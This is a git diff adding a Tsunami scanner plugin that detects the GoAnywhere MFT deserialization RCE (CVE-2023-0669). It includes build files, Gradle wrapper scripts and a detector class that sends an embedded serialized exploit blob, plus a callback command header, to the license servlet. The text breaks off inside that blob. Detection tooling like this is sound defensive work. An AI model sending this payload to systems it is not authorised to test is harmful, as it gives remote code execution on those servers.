diff --git a/community/detectors/goanywhere_cve_2023_0669/README.md b/community/detectors/goanywhere_cve_2023_0669/README.md
new file mode 100644
index 000000000..59ce86646
--- /dev/null
+++ b/community/detectors/goanywhere_cve_2023_0669/README.md
@@ -0,0 +1,32 @@
+# CVE-2023-0669 GoAnywhere MFT RCE vulnerability Detector
+
+## CVE
+
+[CVE-2023-0669](https://nvd.nist.gov/vuln/detail/CVE-2023-0669)
+
+## Description of Vulnerability
+
+This detector checks for GoAnywhere MFT RCE vulnerability CVE-2023-0669.
+
+GoAnywhere MFT suffers from a pre-authentication command injection vulnerability in the License Response Servlet due to
+deserializing an arbitrary attacker-controlled object.
+
+All versions prior to 7.1.1 are affected,Update GoAnywhere MFT to a version that provides a fix 7.1.2 or later
+
+## Related Articles
+
+https://nvd.nist.gov/vuln/detail/CVE-2023-0669
+
+https://www.vicarius.io/vsociety/posts/unauthenticated-rce-in-goanywhere
+
+https://www.cve.org/CVERecord?id=CVE-2023-0669
+
+## Build jar file for this plugin
+
+Using `gradlew`:
+
+```shell
+./gradlew jar
+```
+
+Tsunami identifiable jar file is located at `build/libs` directory.
diff --git a/community/detectors/goanywhere_cve_2023_0669/build.gradle b/community/detectors/goanywhere_cve_2023_0669/build.gradle
new file mode 100644
index 000000000..77bd8e54a
--- /dev/null
+++ b/community/detectors/goanywhere_cve_2023_0669/build.gradle
@@ -0,0 +1,72 @@
+plugins {
+ id 'java-library'
+}
+
+description = 'CVE-2023-0669 GoAnywhere MFT RCE vulnerability Detector'
+group 'com.google.tsunami'
+version = '0.0.1-SNAPSHOT'
+
+repositories {
+ maven { // The google mirror is less flaky than mavenCentral()
+ url 'https://maven-central.storage-download.googleapis.com/repos/central/data/'
+ }
+ mavenLocal()
+ mavenCentral()
+}
+
+java {
+
+
+ sourceCompatibility = JavaVersion.VERSION_11
+ targetCompatibility = JavaVersion.VERSION_11
+
+ jar.manifest {
+ attributes('Implementation-Title': name,
+
+
+ 'Implementation-Version': version,
+ 'Built-By': System.getProperty('user.name'),
+ 'Built-JDK': System.getProperty('java.version'),
+ 'Source-Compatibility': sourceCompatibility,
+ 'Target-Compatibility': targetCompatibility)
+ }
+
+ javadoc.options {
+ encoding = 'UTF-8'
+ use = true
+ links 'https://docs.oracle.com/en/java/javase/11/'
+ source = '11'
+ }
+
+ // Log stacktrace to console when test fails.
+ test {
+ testLogging {
+ exceptionFormat = 'full'
+ showExceptions true
+ showCauses true
+ showStackTraces true
+ }
+ maxHeapSize = '1500m'
+ }
+}
+
+ext {
+ tsunamiVersion = 'latest.release'
+ junitVersion = '4.13'
+ mockitoVersion = '2.28.2'
+ truthVersion = '1.0.1'
+ okhttpVersion = '3.12.0'
+}
+
+dependencies {
+ implementation "com.google.tsunami:tsunami-common:${tsunamiVersion}"
+ implementation "com.google.tsunami:tsunami-plugin:${tsunamiVersion}"
+ implementation "com.google.tsunami:tsunami-proto:${tsunamiVersion}"
+
+ testImplementation "junit:junit:${junitVersion}"
+ testImplementation "org.mockito:mockito-core:${mockitoVersion}"
+ testImplementation "com.google.truth:truth:${truthVersion}"
+ testImplementation "com.squareup.okhttp3:mockwebserver:${okhttpVersion}"
+ testImplementation "com.google.truth.extensions:truth-java8-extension:${truthVersion}"
+ testImplementation "com.google.truth.extensions:truth-proto-extension:${truthVersion}"
+}
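Review bot: `tsunamiVersion = 'latest.release'` in the `ext` block is a dynamic version, so `./gradlew jar` resolves whichever tsunami-common, tsunami-plugin and tsunami-proto release is newest at build time; the resulting plugin jar is not reproducible and silently absorbs upstream API or transitive-dependency changes. Pin it to a concrete release, `tsunamiVersion = '<pinned-tsunami-release>'`, and bump it deliberately, which also ties the detector to the exact API it was written and tested against. This may be inherited from the community-plugin template, in which case the same change belongs there too.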
diff --git a/community/detectors/goanywhere_cve_2023_0669/gradle/wrapper/gradle-wrapper.jar b/community/detectors/goanywhere_cve_2023_0669/gradle/wrapper/gradle-wrapper.jar
new file mode 100644
index 000000000..2c3521197
Binary files /dev/null and b/community/detectors/goanywhere_cve_2023_0669/gradle/wrapper/gradle-wrapper.jar differ
diff --git a/community/detectors/goanywhere_cve_2023_0669/gradle/wrapper/gradle-wrapper.properties b/community/detectors/goanywhere_cve_2023_0669/gradle/wrapper/gradle-wrapper.properties
new file mode 100644
index 000000000..d04736436
--- /dev/null
+++ b/community/detectors/goanywhere_cve_2023_0669/gradle/wrapper/gradle-wrapper.properties
@@ -0,0 +1,7 @@
+distributionBase=GRADLE_USER_HOME
+distributionPath=wrapper/dists
+distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip
+networkTimeout=10000
+validateDistributionUrl=true
+zipStoreBase=GRADLE_USER_HOME
+zipStorePath=wrapper/dists
diff --git a/community/detectors/goanywhere_cve_2023_0669/gradlew b/community/detectors/goanywhere_cve_2023_0669/gradlew
new file mode 100644
index 000000000..f5feea6d6
--- /dev/null
+++ b/community/detectors/goanywhere_cve_2023_0669/gradlew
@@ -0,0 +1,252 @@ +#!/bin/sh + +# +# Copyright © 2015-2021 the original authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +# SPDX-License-Identifier: Apache-2.0 +# + +############################################################################## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. 
+# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/platforms/jvm/plugins-application/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. +# +############################################################################## + +# Attempt to set APP_HOME + +# Resolve links: $0 may be a link +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac +done + +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd -P "${APP_HOME:-./}" > /dev/null && printf '%s +' "$PWD" ) || exit + +# Use the maximum available, or set MAX_FD != -1 to use that value. +MAX_FD=maximum + +warn () { + echo "$*" +} >&2 + +die () { + echo + echo "$*" + echo + exit 1 +} >&2 + +# OS specific support (must be 'true' or 'false'). +cygwin=false +msys=false +darwin=false +nonstop=false +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; +esac + +CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar + + +# Determine the Java command to use to start the JVM. 
+if [ -n "$JAVA_HOME" ] ; then + if [ -x "$JAVA_HOME/jre/sh/java" ] ; then + # IBM's JDK on AIX uses strange locations for the executables + JAVACMD=$JAVA_HOME/jre/sh/java + else + JAVACMD=$JAVA_HOME/bin/java + fi + if [ ! -x "$JAVACMD" ] ; then + die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME + +Please set the JAVA_HOME variable in your environment to match the +location of your Java installation." + fi +else + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + +Please set the JAVA_HOME variable in your environment to match the +location of your Java installation." + fi +fi + +# Increase the maximum file descriptors if we can. +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac +fi + +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. 
+ +# For Cygwin or MSYS, switch paths to Windows format before running java +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + + # Now convert the arguments - kludge to limit ourselves to /bin/sh + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) + fi + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg + done +fi + + +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. 
+# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' + +exec "$JAVACMD" "$@" diff --git a/community/detectors/goanywhere_cve_2023_0669/gradlew.bat b/community/detectors/goanywhere_cve_2023_0669/gradlew.bat new file mode 100644 index 000000000..9d21a2183 --- /dev/null +++ b/community/detectors/goanywhere_cve_2023_0669/gradlew.bat 
@@ -0,0 +1,94 @@ +@rem +@rem Copyright 2015 the original author or authors. +@rem +@rem Licensed under the Apache License, Version 2.0 (the "License"); +@rem you may not use this file except in compliance with the License. +@rem You may obtain a copy of the License at +@rem +@rem https://www.apache.org/licenses/LICENSE-2.0 +@rem +@rem Unless required by applicable law or agreed to in writing, software +@rem distributed under the License is distributed on an "AS IS" BASIS, +@rem WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +@rem See the License for the specific language governing permissions and +@rem limitations under the License. +@rem +@rem SPDX-License-Identifier: Apache-2.0 +@rem + +@if "%DEBUG%"=="" @echo off +@rem ########################################################################## +@rem +@rem Gradle startup script for Windows +@rem +@rem ########################################################################## + +@rem Set local scope for the variables with windows NT shell +if "%OS%"=="Windows_NT" setlocal + +set DIRNAME=%~dp0 +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused +set APP_BASE_NAME=%~n0 +set APP_HOME=%DIRNAME% + +@rem Resolve any "." and ".." in APP_HOME to make it shorter. +for %%i in ("%APP_HOME%") do set APP_HOME=%%~fi + +@rem Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +set DEFAULT_JVM_OPTS="-Xmx64m" "-Xms64m" + +@rem Find java.exe +if defined JAVA_HOME goto findJavaFromJavaHome + +set JAVA_EXE=java.exe +%JAVA_EXE% -version >NUL 2>&1 +if %ERRORLEVEL% equ 0 goto execute + +echo. 1>&2 +echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. 1>&2 +echo. 1>&2 +echo Please set the JAVA_HOME variable in your environment to match the 1>&2 +echo location of your Java installation. 
1>&2 + +goto fail + +:findJavaFromJavaHome +set JAVA_HOME=%JAVA_HOME:"=% +set JAVA_EXE=%JAVA_HOME%/bin/java.exe + +if exist "%JAVA_EXE%" goto execute + +echo. 1>&2 +echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% 1>&2 +echo. 1>&2 +echo Please set the JAVA_HOME variable in your environment to match the 1>&2 +echo location of your Java installation. 1>&2 + +goto fail + +:execute +@rem Setup the command line + +set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar + + +@rem Execute Gradle +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* + +:end +@rem End local scope for the variables with windows NT shell +if %ERRORLEVEL% equ 0 goto mainEnd + +:fail +rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of +rem the _cmd.exe /c_ return code! +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% + +:mainEnd +if "%OS%"=="Windows_NT" endlocal + +:omega diff --git a/community/detectors/goanywhere_cve_2023_0669/settings.gradle b/community/detectors/goanywhere_cve_2023_0669/settings.gradle new file mode 100644 index 000000000..9d2694249 --- /dev/null +++ b/community/detectors/goanywhere_cve_2023_0669/settings.gradle @@ -0,0 +1,2 @@ +rootProject.name = 'goanywhere_cve_2023_0669' + diff --git a/community/detectors/goanywhere_cve_2023_0669/src/main/java/com/google/tsunami/plugins/detectors/goanywhere/Cve20230669DetectorBootstrapModule.java b/community/detectors/goanywhere_cve_2023_0669/src/main/java/com/google/tsunami/plugins/detectors/goanywhere/Cve20230669DetectorBootstrapModule.java new file mode 100644 index 000000000..e88b2ac08 --- /dev/null +++ b/community/detectors/goanywhere_cve_2023_0669/src/main/java/com/google/tsunami/plugins/detectors/goanywhere/Cve20230669DetectorBootstrapModule.java 
@@ -0,0 +1,11 @@
+package com.google.tsunami.plugins.detectors.goanywhere;
+
+import com.google.tsunami.plugin.PluginBootstrapModule;
+
+public class Cve20230669DetectorBootstrapModule extends PluginBootstrapModule {
+
+ @Override
+ protected void configurePlugin() {
+ registerPlugin(Cve20230669VulnDetector.class);
+ }
+}
diff --git a/community/detectors/goanywhere_cve_2023_0669/src/main/java/com/google/tsunami/plugins/detectors/goanywhere/Cve20230669VulnDetector.java b/community/detectors/goanywhere_cve_2023_0669/src/main/java/com/google/tsunami/plugins/detectors/goanywhere/Cve20230669VulnDetector.java
new file mode 100644
index 000000000..232064283
--- /dev/null
+++ b/community/detectors/goanywhere_cve_2023_0669/src/main/java/com/google/tsunami/plugins/detectors/goanywhere/Cve20230669VulnDetector.java
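Review bot: `Cve20230669DetectorBootstrapModule` has no class-level Javadoc, while the detector it registers does. A one-liner above the class declaration, `/** A {@link PluginBootstrapModule} that registers {@link Cve20230669VulnDetector} with Tsunami. */`, documents the module's only responsibility and matches the public-type Javadoc convention used elsewhere in the plugin.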
@@ -0,0 +1,141 @@ +package com.google.tsunami.plugins.detectors.goanywhere; + +import static com.google.common.base.Preconditions.checkNotNull; +import static com.google.common.collect.ImmutableList.toImmutableList; +import static com.google.tsunami.common.net.http.HttpRequest.post; + +import com.google.common.collect.ImmutableList; +import com.google.common.flogger.GoogleLogger; +import com.google.protobuf.ByteString; +import com.google.protobuf.util.Timestamps; +import com.google.tsunami.common.data.NetworkServiceUtils; +import com.google.tsunami.common.net.http.HttpClient; +import com.google.tsunami.common.net.http.HttpHeaders; +import com.google.tsunami.common.net.http.HttpResponse; +import com.google.tsunami.common.time.UtcClock; +import com.google.tsunami.plugin.PluginType; +import com.google.tsunami.plugin.VulnDetector; +import com.google.tsunami.plugin.annotations.PluginInfo; +import com.google.tsunami.plugin.payload.Payload; +import com.google.tsunami.plugin.payload.PayloadGenerator; +import com.google.tsunami.proto.*; +import java.io.IOException; +import java.time.Clock; +import java.time.Instant; +import javax.inject.Inject; + +/** A {@link VulnDetector} that detects the CVE-2022-0540 vulnerability. Reading */ +@PluginInfo( + type = PluginType.VULN_DETECTION, + author = "SuperX (SuperX.SIR@proton.me)", + name = "Cve20230669VulnDetector", + version = "0.1", + description = + "GoAnywhere MFT suffers from a pre-authentication command injection vulnerability in the License " + + "Response Servlet due to deserializing an arbitrary attacker-controlled object." 
+ + "version 7.1.1 and its earlier versions", + bootstrapModule = Cve20230669DetectorBootstrapModule.class) +public class Cve20230669VulnDetector implements VulnDetector { + + private static final GoogleLogger logger = GoogleLogger.forEnclosingClass(); + private static final String LICENSE_URL = "goanywhere/lic/accept"; + private static final String COMMAND_HEADER = "x-protect"; + private final HttpClient httpClient; + private final Clock utcClock; + private final PayloadGenerator payloadGenerator; + + @Inject + Cve20230669VulnDetector( + @UtcClock Clock utcClock, HttpClient httpClient, PayloadGenerator payloadGenerator) { + this.httpClient = checkNotNull(httpClient).modify().setFollowRedirects(false).build(); + this.utcClock = checkNotNull(utcClock); + this.payloadGenerator = checkNotNull(payloadGenerator); + } + + @Override + public DetectionReportList detect( + TargetInfo targetInfo, ImmutableList matchedServices) { + logger.atInfo().log("CVE-2023-0669 starts detecting."); + + return DetectionReportList.newBuilder() + .addAllDetectionReports( + matchedServices.stream() + .filter(NetworkServiceUtils::isWebService) + .filter(this::isServiceVulnerable) + .map(networkService -> buildDetectionReport(targetInfo, networkService)) + .collect(toImmutableList())) + .build(); + } + + private boolean isServiceVulnerable(NetworkService networkService) { + PayloadGeneratorConfig config = + PayloadGeneratorConfig.newBuilder() + .setVulnerabilityType(PayloadGeneratorConfig.VulnerabilityType.BLIND_RCE) + .setInterpretationEnvironment( + PayloadGeneratorConfig.InterpretationEnvironment.LINUX_SHELL) + .setExecutionEnvironment( + PayloadGeneratorConfig.ExecutionEnvironment.EXEC_INTERPRETATION_ENVIRONMENT) + .build(); + + if (!payloadGenerator.isCallbackServerEnabled()) { + logger.atInfo().log("Callback server disabled but required for this detector."); + return false; + } + + Payload payload = this.payloadGenerator.generate(config); + String commandToInject = String.format("%s", 
payload.getPayload()); + String licenseUrl = + NetworkServiceUtils.buildWebApplicationRootUrl(networkService) + LICENSE_URL; + + String deserialized = + "bundle=Jh88_jqGQWSbZmiCc1DErQhwOhCTLkYmA1yXgf86Ha5HF9IfVuQMLOfBS_fjlP7wTTEg2" + + "-Jx9nBDyFUKVTroXpFBt7zN1XDX58VKZCxCXlUD45d4laUUnNuzdyvNLT2b_gYKBi2" + + "-ny7fc2lOHNgalYV13mQzCTs0EgEUE9AuDUIMcFYx00pv4g4EOgEjeWbAx40rTtRby71AxapyXKy" + + "-4XChDHVlPB1AV3njBKGWT6gHdPxT8hb75Ycrpjdk9EQ1HW4WJiz4uaVBu7hXm_Eag15IpIWgojFy4hst8" + + "-q9YMms8Omq5lbdLabUHRcJAd6rLu6QrPLepYXQgGfMi_Qmj0qf5vXLfSX20cSBT_IEBlzzBR3lq_hiqrAfmZZCV3Y1HeMPpaMsmzL5zM1VTMX-5Pi5JGKMJ2Al2BZVZUUZQNqrcnueMVl1ZNhGMJ8eSFBCb4WGaNrhfgQ3sWUW3_A_ln_XwLi8z6XCOT5sJmFYZXBC4vYtY4leatX_o__lJHYPuA_TEmuEmEhIccj5Ou2xOvazmw9oXVUbM0vkPsb1UDyyTF0Ee85W0CUUCzb3rouvUDFaOZZLe08Z_Km2LgSq9Wr3fKojx_UevkOkOfwfiPlnJcQTRr45useRtOlHrJpP1iWSLi2vwK8bojMdCWzF13H8MmDjrJBCbcbChsXQkNcAJqkYa3y2SZXkwISRigFVLRnjDbyQLqLAzE0inCSf7NF9abKU5ZW8yMgF6NT802MJCz0gRJD6zLbFZSBYfGlzFJmu9-ZWYVywkwmu3xQrrA_tCRdqvd5zeHd3CgWOzBjOg55_iBNcPZOPYhMXD1ZEpPyG0CQpJfIUiblo4gGV0op-Mb2z5HIuvJ-l_YCxoYJi5RCdtgGoSmIo9wN59S0PeI6LI69EsoquDh7EA9Z7pc6XGk6rrbsJoFcV-lp_73dwmOH1U6pZRcEeMYgrB3n_R0BsoYHTika_iGEmmYv1CgBDfMlmVdQbtefAwh_AcJ9pyNACTwWdXQ0xmto3YYLbizDnmZ--NeiQ_534fTrGfjcIsbLgEnHcpG7Fwng72m7pHVy5LpurnRJXJyFBJW9IUF0vwH_UDZtAfeBK4kMbkuJrCTtQdyCks5SjfQWTArKeNGiKbGWReNhOnUnK8A2sxiYtvqlUi01mfOIfoc-9Lp6wXEBrNzWHH0zPWu4SNQmhR-JwmvFeIErraf83vz0_sRoU7IcSqKEF5zFjFF8n1oWqwBP5a3s_fKgbQ_UA74vmFh5cc_tlpBXS1oG8_EU5GAFI-woAA0Mlgkwmo-fGH1w1wB1LSOzgiT7r4QKDko55Timnwpk_D4RmXesvtu49-xyXcg4sL6NG5ujC6o5kKbTrwi7Vp8hjEx1v6nXeMfUbuWjYicH-ZIE_P_SMevvDUOQm3UZ67MbmdkReIR32TN_88A4J5dKN0QC08HLkYNSjsRp7XyXbSi5dZp3eQ6zkW9KuYU-S-NSBC9pV4arvsZXcwtWRTjweK49JIIgLMayI4y9TOjhg-LiwwzIlTY_t0KuzHSIYSw82LxmOeDhdQUC-sSOeV1G2sR095x3NDmfEfdvduTceU9cD3ofEFtedX5Z77aGFoVhdoG_hOjnYnaoaWYPe7JChYE0TZZfu3V7HF57X0cwoYYPDP6XzSf6kmxEWDoenYsPTmY_Evhqwp3Fhzko8_G-UR2tNH9JjIoouCEd8o8Gy7gnye2_u6wzCBuChv1yEug0miW8nSCQk69oHWeti94h1toBecBt70m8ySDHgL80vs4n5qHK2Mjv_eb3a5UrajOObvfoNMg_
K85EudKBrdgW6bEV5KsZhFBDpDnxA7X8CHEHZiK4iDCFUCmSMCXQz7KqkHrcWh8l1ut7IPoxuiRhdI5wuNSw-xVmVwM1kJo5ahlOZcsARCNZ9NcAjcqojMDZjgkPo7lt-5Lrl2gPHg80YkNsfdB8Ao91vcZ6UuJ45ERB1G8V7TwxCMsHU8h8FFet1zb55rcBE-YJ5rvzaXif3OOFiS4MnA0LDszZkFJ4gW2SIMban79bz38yBnEz-au5l2SwkG7tY3DiKobiIz6ZJjOzVj2jAT7MsCpB8XNl8tCMYJHWErFrExXbosh-YvXoU8HCN_XALqBSZJyffqKu0iAYcyxc35QQl55ll-IybJU3Gu4LPGT6HXPlK3Hepmdd1ZhLzQG-adp465TzIDX-0YUK_Px-J0gmoW-kgUiGAVKrHIS4Qh-1E80u7GI_WUZTXSE7sgKUX-2qEUj6reo7Kf_4c_CZrwkA4RtoQrQMCs4Bs7dAft1eAqb9O-SDcW8kShwpUow3nz6PFKkdZ4SjYTNUjANTJT_7Yvzu-nHDPpEyriuZ4zcGKTadRgL2bbv1MwcTzJ1iCGMGXNk-sMiqOpqGdW_tAbfrGAuAjSiK5vCK4tO2xjR9qlMu9mzvC6FWXMlgoDFWbrXDSLUWWpgthJssAzniuX1iuGBlWmC7MzOCLQYyHKTIGDysqW4BgHQabqeXtqPoCLUCcCY8tlaACSFFe9ZQcQXgTHwClL5_TI2-9Cn5wIz28o-krld22hZ5KUWvXcW_278n6TxUJZPArM-KweuxdkzFYHjg1i8eZygMFz17MA9rUSTJzG7qvyXR_OIvI9EcGVP91noBQ2pN9zqFq7o81DRUmrNbNL1I4GPwK4kkLJVOJ1o6Hgw-zXmjeMveQII-aRzh-O2zZ9dpBJ8Yne7nWgeq1XAxW3A0lkqKr5hRbJD8najEI1xWvUEBHbPLD3oy4FGrs2Pegj7JlsGIwcmsQ8S_3bcp9ycdpNWXR0qgku3ltIZdFfW3Tnm-NFbfvkIRqmk8CaYsX2NlXGCJBLSt5HHioXDyUn1dRKvTpLx8aw41HqqGAACACvSWo0VLi4uXvxUZTgeA7q6BzH7KxptrTX62rBrU6R2ul5cgjTEYnakqcNUyJDjbxHBw1wY3k75erwfFj_pc6pE0PlB9zqIROk0yOiy2OWpg4KCAjryY1U0eOjnZVsoWjEuBT7Uvu0_9h04yZqToxRfu0WIODBLGJZ0lpx2bXtcaZPRFNwOFAeGHNpSY-ZO48bQR2Eo8kbB62w5DU6pKlFzCzK-bOzVvYUYDkYoQUSclOkW96M0hQ5DvJggB14AuXv0n4jsC1j_z4Yg1oeVnSbDA1PuGcAq8TovQX1KzpSHORoQFEhcclGxhc5-6kPt_cqImHd2C2UpYhVGEff3d2ShRzOETbELCR9w5OLY5EB4AxIOB9K4UUB-iqusjEmTYogjUUPhrHz1Dl88DD-W_QIR1fSpKDlCKWZXLWueZKXEFTKTIrWltCqbANJMPx5ww4Yo7jau6jZOPZWaZg_rApAJ4GhISBNRNUaRMUwRuKHrIaXBamJfkZXZNBJaUyv5uFXkCqkKlotr3JpOe8kBeFq_h-mmgM5G2pCK1LvnpIzXqMe1vPuR7om0ar4hRpV8aBlmhG9M7N2NQS50c-d96qKQQNDT_RgKslJfEPl4LuBie9IFlZ9qbpyq25XadMoDvDjuddAGb2jouTI8t1wXoK_fGMzUlPa7_Fq1yJqaeLF4gvoqZcEdocc0BZuM_8YqQGPhPRtxJ2wfnJ-9rdz58RNX8KoUnPEo7Y_GU5MqcmIsIqWgLkLHbFTytO9Xf2v90LKZoJy6vxfuD0C3ocGZ4syFrus4zZ0ydMU8L0b5A4Z9c4U7LE4kn79ujOBeseZDE1nAr2RL1c9ReAjJ6CLqpPYTihhLHglog64HMcxTGj1_fEnrNB53mzD0cw1UB5_kRE-Yr_JY0PRvYYGVfKfaXeklUVn3R
b-npVABFVQ6XrCN1dUFOhy4rUe3mZ3kyAXvjpXiRrkRnbKAk1c2ynLrIDetbNoQQGdIouuBEDX9NJIE9zKAttSQBpC5Xkoeu68oQcTU3IW_N848fuGIUsUl4oqO1wjNuG4TTBCCA82gu269_LCg5jB9JEa-DlhPzRwoGhJ4muc1ThgsINoLcevNu5iwP-ebUQfolW6ZdR3i12Eh9bZi3yiE7Sieb-dXx_qm5IrdlY0SZWKNC8OqlxVUzLaseMBE3kPrT-Dz6ClJXewCEU1vGYzPvKggCgg5clwEwsjGsOq7XYLGRJ9f5pMKZkcfO6-v4FpCk3fjHh0NDDZ8EE3i74a5fh1wVKsR2EJPpl6bEpWhMUDPtcavuTP7xbJC1sFDuLzoSE6qVXLbZFWPS6VMCEzkJ1-FxVsVE_WE4v72iygfLGZaOFgzyVOSEZAm8GThgHsxrKTb2_v5JcWLuock1Z6uva8P13htuNHACPZ3yhkXbuJ2b-6ucy2ZLurigtEDsNsmXsybmWdpS4vA6gnPDr5iSxVXz4BLyW0ShEbKLls_eJ_pH-y1b9Hw0KVVbcE05-bckumz7H-LwhcGVBsi2SKpoGSugH6gbX_fqrraMB0aC-0v6JIZ8WUNa7ElaMfJsE6XstjaE7KjXFHuhyQKeHgWKjm1oV8yLW7vRuqhs5RfWV3E09y2yASv_DY1WxMotFAqOHhz-zt3CiZCXQkPsjly3uHDKLrIjMYrHFvPPmQ8jD6AWiupBSVUi9yFnSFeZq8Ws3-Ki8JQEuWtMhCOsF5nBIb9NUifxO6sK2hUlbBVnhGV1PAz1FZ0tMHhFg7AVeviqUlePVASRtUQ-HmW9qPqH1UXiwysQAprepW6tHuExtYchRcla7ApOqUcQl1oCdQl6tsvn3ewlMTHvAyhUMjeap3yHlzUro-kFf-D285ircmCHRvoXgySqqZjO_8hkEcgBEWSp5Yn8xNZmw9PEthJzvAL2F6UfY58G_WrSIj5B-6GgHdgDVSzLiYSh_lrMFEd4QBtVYLz9KWlY5jjXxmN50RjWGhf2qx0iGrFC2ZnAwN6RxrB07Gl-nI2rAYVWoa_oIz_3s2rI7ll6fvzmdwKrSPNdcnG3MYVvTo8gAHrvhgFUje71_EgabRgOQv6XFCX6Vhsh9c